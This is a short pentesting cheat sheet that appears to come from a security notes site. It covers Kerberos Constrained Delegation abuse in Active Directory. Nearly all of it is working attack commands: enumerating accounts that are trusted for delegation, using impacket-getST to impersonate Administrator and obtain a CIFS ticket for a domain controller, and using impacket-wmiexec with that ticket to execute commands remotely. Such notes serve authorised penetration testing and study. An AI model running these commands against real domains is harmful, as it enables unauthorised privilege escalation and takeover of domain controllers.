# Constrained Delegation Attack

If a compromised account has the Kerberos Constrained Delegation right, the account may impersonate another user to request Kerberos service ticket and use it for such as signin services.

### Investigation <a href="#investigation" id="investigation"></a>

#### Check if Kerberos Constrained Delegation Enabled for User <a href="#check-if-kerberos-constrained-delegation-enabled-for-user" id="check-if-kerberos-constrained-delegation-enabled-for-user"></a>

Reference: <https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation#prerequisites>

```
Get-NetUser -TrustedToAuth
```

### Exploit <a href="#exploit" id="exploit"></a>

#### 1. Request Service Ticket for Another User <a href="#id-1-request-service-ticket-for-another-user" id="id-1-request-service-ticket-for-another-user"></a>

The target SPN needs to be allowed for delegation.

```
# -k: Use Kerberos Auth
impacket-getST -k -impersonate Administrator -spn cifs/dc.example.local example.local/UserName
```

#### 2. Use the Service Ticket <a href="#id-2-use-the-service-ticket" id="id-2-use-the-service-ticket"></a>

After getting the service ticket, we can use it for further pentesting.\
We need to add the environment variable as below:

```
export KRB5CCNAME=`pwd`/Administrator.ccache

# Check by listing tickets.
# If the klist command not found, install it by `apt install krb5-user`
klist
```

* Login to Services with Kerberos Auth

  ```
  # -k: Use Kerberos Auth
  # -no-pass: No password
  impacket-wmiexec example.local/Administrator@example.local -k -no-pass
  ```